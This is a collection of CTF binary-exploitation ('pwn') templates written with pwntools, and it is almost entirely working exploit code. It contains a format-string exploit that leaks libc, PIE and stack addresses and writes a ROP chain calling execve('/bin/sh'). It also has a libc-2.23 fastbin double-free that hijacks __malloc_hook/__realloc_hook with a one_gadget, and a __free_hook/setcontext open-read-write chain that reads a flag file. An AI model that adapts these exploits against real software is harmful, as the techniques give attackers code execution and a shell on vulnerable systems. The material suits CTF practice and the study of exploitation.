pwn模板整理

ANY

from pwn import * 
from pwncli import *
from LibcSearcher import*
io = process("./ttt")
context.terminal = ["tmux","splitw","-h"]
context.log_level = 'debug'
context.arch = 'amd64'
ARROW = ' ============================================> ' 
s       = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
rv      = lambda num          	    :io.recv(num)
rec      = lambda           	        :io.recv()
rl      = lambda                    :io.recvline()
ru      = lambda delims             :io.recvuntil(delims)
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia	= lambda                    :io.interactive()
li      = lambda tag, x             :print("\x1b[1;38;5;214m" + tag + ARROW + "\x1b[0m" + '\x1b[01;38;5;214m' + x + '\x1b[0m')
ll      = lambda x                  :print('\x1b[01;38;5;1m' + x + '\x1b[0m')

fmtstr

def getadd(fmt):
    sa(b'First, please tell me your name.\n',fmt)
    byte_stream = io.recvuntil(b"!")
    split_parts = byte_stream.split(b">")
    return split_parts

from pwn import * 
from pwncli import *
from LibcSearcher import*
io = process("./vuln")
elf = ELF("./libc.so.6")
#io = remote("node5.buuoj.cn",25651)
context.terminal = ["tmux","splitw","-h"]
context.log_level = 'debug'
context.arch = 'amd64'
ARROW = ' ============================================> ' 
s       = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
rv      = lambda num          	    :io.recv(num)
rec      = lambda           	        :io.recv()
rl      = lambda                    :io.recvline()
ru      = lambda delims             :io.recvuntil(delims)
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia	= lambda                    :io.interactive()
li      = lambda tag, x             :print("\x1b[1;38;5;214m" + tag + ARROW + "\x1b[0m" + '\x1b[01;38;5;214m' + x + '\x1b[0m')
ll      = lambda x                  :print('\x1b[01;38;5;1m' + x + '\x1b[0m')


def getadd(fmt):
    sla("what's your favourite food: ",fmt)
    ru(b'You like ')
    byte_stream = io.recvuntil(b"!")[:-1]
    split_parts = byte_stream.split(b">")
    return split_parts
def pr(add1,add2,canary,stackadd):
    li("libcbase",hex(add1))
    li("probase",hex(add2))
    li("canary",hex(canary))
    li("stack",hex(stackadd))
def change(front,num,position,by):
    if by == 1:
        if num != 0:
            fmt = f"%{num}c%{position}$hhn"
        else:
            fmt = f"%{position}$hhn"
    if by == 2:
        if num != 0:
            fmt = f"%{num}c%{position}$hn"
        else:
            fmt = f"%{position}$hn"
    sla(front,fmt.encode())

sa(b'Give me your name:',32*b'a')
ru(b'Hello ')
adds = getadd(b'%8$p>%9$p>%11$p!')
probase = int(adds[0],16) + 0x5600b5200000 - 0x5600b5200b60
libcbase = int(adds[1],16) + 0x7ff87b3d0000 - 0x7ff87b3f0840
rbp = int(adds[2],16) + 0x7fffd13d3d80 - 0x7fffd13d3e68  
countadd = rbp - 0xc
pr(libcbase,probase,0x0,rbp)
## 改次数
sleep(0.5)
change(b"what's your favourite food: ",(countadd&0xffff),11,2)
change(b"what's your favourite food: ",(0x100-136),37,2)
sleep(0.5)
## ret地址
rdi = libcbase+ 0x0000000000021112
rsi = libcbase + 0x00000000000202f8
rdx = libcbase + 0x0000000000001b92
binsh = libcbase + 0x000000000018ce57
exc = libcbase + elf.sym["execve"]
## 使用25-39

ret1 = rbp + 8
ret1value = ret1+8

#gdb.attach(io)
for i in range(4):
    change(b"what's your favourite food: ",((ret1+2*i)&0xffff),25,2) ##改目的地址
    change(b"what's your favourite food: ",((rdi>>(16*i))&0xffff),39,2) ##改目的地址的值
for i in range(4):
    change(b"what's your favourite food: ",((ret1value+2*i)&0xffff),25,2) ##改目的地址
    change(b"what's your favourite food: ",((binsh>>(16*i))&0xffff),39,2) ##改目的地址的值
#pause()
## 改rsi
ret2 = ret1value + 8
ret2value = ret2 + 8
'''
for i in range(4):
    change(b"what's your favourite food: ",((ret2+2*i)&0xffff),25,2)
    change(b"what's your favourite food: ",((rsi>>(16*i))&0xffff),39,2)
for i in range(4):
    change(b"what's your favourite food: ",((ret2value+2*i)&0xffff),25,2)
    change(b"what's your favourite food: ",((0x0>>(16*i))&0xffff),39,2)
'''
for i in range(8):
    change(b"what's your favourite food: ",((ret2+i)&0xff),25,1)
    change(b"what's your favourite food: ",((rsi>>(8*i))&0xff),39,1)
for i in range(8):
    change(b"what's your favourite food: ",((ret2value+i)&0xff),25,1)
    change(b"what's your favourite food: ",((0x0>>(8*i))&0xff),39,1)
## 改rdx
ret3 = ret2value + 8
ret3value = ret3 + 8
'''
for i in range(4):
    change(b"what's your favourite food: ",((ret3+2*i)&0xffff),25,2)
    change(b"what's your favourite food: ",((rdx>>(16*i))&0xffff),39,2)
for i in range(4):
    change(b"what's your favourite food: ",((ret3value+2*i)&0xffff),25,2)
    change(b"what's your favourite food: ",((0x0>>(16*i))&0xffff),39,2)
'''
for i in range(8):
    change(b"what's your favourite food: ",((ret3+i)&0xff),25,1)
    change(b"what's your favourite food: ",((rdx>>(8*i))&0xff),39,1)
for i in range(8):
    change(b"what's your favourite food: ",((ret3value+i)&0xff),25,1)
    change(b"what's your favourite food: ",((0x0>>(8*i))&0xff),39,1)
##改sys
ret4 = ret3value + 8
'''
for i in range(4):
    change(b"what's your favourite food: ",((ret4+2*i)&0xffff),25,2)
    change(b"what's your favourite food: ",((exc>>(16*i))&0xffff),39,2)
'''
for i in range(8):
    change(b"what's your favourite food: ",((ret4+i)&0xff),25,1)
    change(b"what's your favourite food: ",((exc>>(8*i))&0xff),39,1)




for i in range(23):
    sla(b"what's your favourite food: ",b'a')
io.interactive()

pr

def pr(add1,add2,canary,stackadd):
    li("libcbase",hex(add1))
    li("probase",hex(add2))
    li("canary",hex(canary))
    li("stack",hex(stackadd))

rellochook+mallochook

from pwn import * 
from pwncli import *
from LibcSearcher import*
io = process("./xueba")
elf = ELF("./libc-2.23.so")
context.terminal = ["tmux","splitw","-h"]
context.log_level = 'debug'
context.arch = 'amd64'
ARROW = ' ============================================> ' 
s       = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
rv      = lambda num          	    :io.recv(num)
rec      = lambda           	        :io.recv()
rl      = lambda                    :io.recvline()
ru      = lambda delims             :io.recvuntil(delims)
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia	= lambda                    :io.interactive()
li      = lambda tag, x             :print("\x1b[1;38;5;214m" + tag + ARROW + "\x1b[0m" + '\x1b[01;38;5;214m' + x + '\x1b[0m')
ll      = lambda x                  :print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def cmd(index):
    sla("5.Exit\n",str(index).encode())
def cre(size,note,chunkcon):
    cmd(1)
    sla(b'How long is your note?\n',str(size).encode())
    sa(b'Input your note name and note content:',note)
    sleep(0.5)
    s(chunkcon)
def show(index):
    cmd(2)
    sla(b'Index:\n',str(index).encode())
    ru(b'Name ')
    name = ru("\n").strip()
    ru(b'Content:')
    con = ru("\n").strip()
    return name,con

def de(index):
    cmd(3)
    sla(b'Index:\n',str(index).encode())
def change(index,letter,last):
    cmd(4)
    sla(b'Index:\n',str(index).encode())
    sa(b'Which letter do you want to change?\n',letter)
    s(last)
def ex():
    cmd(5)

cre(600,16*b'a'+p32(0x1)+b'\x00',8*b'b') #index = 0
cre(0x67,16*b'a'+p32(0x1)+b'\x00',8*b'b') #index = 1 
de(0)

change(0,b'\x00',b'\x01')
name,con = show(0)
libcbase = u64(con.ljust(8,b'\x00')) + 0x7f023dc0f000 - 0x7f023dfd3b78
li("libcbase",hex(libcbase))


cre(0x67,16*b'a'+p32(0x1)+b'\x00',8*b'b') #index = 2
cre(0x88,16*b'a'+p32(0x1)+b'\x00',8*b'b') #index = 3(pro)
de(1)
de(2)
change(1,b'\x00',b'\x01')
de(1)
de(3)
__libc_reallocadd = libcbase + elf.symbols["__libc_realloc"]
one = [libcbase + 0x4526a,libcbase +0xf02a4 ,libcbase +0xf1147]
cre(0x67,16*b'a'+p32(0x1)+b'\x00',p64(libcbase + 0x7f57acdb3af5-0x8-0x7f57ac9ef000))#index = 1  change
cre(0x67,16*b'a'+p32(0x1)+b'\x00',8*b'b')#index = 2
cre(0x67,16*b'a'+p32(0x1)+b'\x00',8*b'b')#index = 3

cre(0x67,16*b'a'+p32(0x1)+b'\x00',(0xb08-0xaf5-0x8)*b'b'+p64(one[0])+p64(__libc_reallocadd+12))#index = 4
de(1)
cmd(1)
sla(b'How long is your note?\n',b'24')
io.interactive()

file_LIST_ALL

https://cord-nape-83b.notion.site/apple2-ecb92e976ae74ff3a1f5788d4623ced7

orw+setcontext

'''
ROPgadget --binary libc.so.6  --only "mov|call" 
'''
'''
0x0000000000167420 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
'''

add(0x40 ,b'a'*0x20 + p64(0) + p64(0x31) + p64(__free_hook)) #18
add(0x20 ,b'a') # 20
add(0x20 ,p64(magic_gadget)) # 27

add(0x10 , p64(0) + p64(stack_addr)) # 28   调用free的时候将stackaddr -> rdx
success(hex(stack_addr))

stack = b'./flag\x00\x00' + p64(0)*3 + p64(setcontext_61)
stack+= b'\x00'*(0xa0-0x28)
stack+= p64(orw_addr) + p64(ret_addr)

add(0xb0 ,stack) # 29

orw = p64(pop_rdi_ret) + p64(stack_addr)
orw+= p64(pop_rax_ret) + p64(2)
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(3)
orw+= p64(pop_rsi_ret) + p64(bss_addr)
orw+= p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
orw+= p64(pop_rax_ret) + p64(0)
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(1)
orw+= p64(pop_rsi_ret) + p64(bss_addr)
orw+= p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
orw+= p64(pop_rax_ret) + p64(1)
orw+= p64(syscall_ret)

add(0x100 ,orw) # 30
#gdb.attach(s)
delete(28)
s.interactive()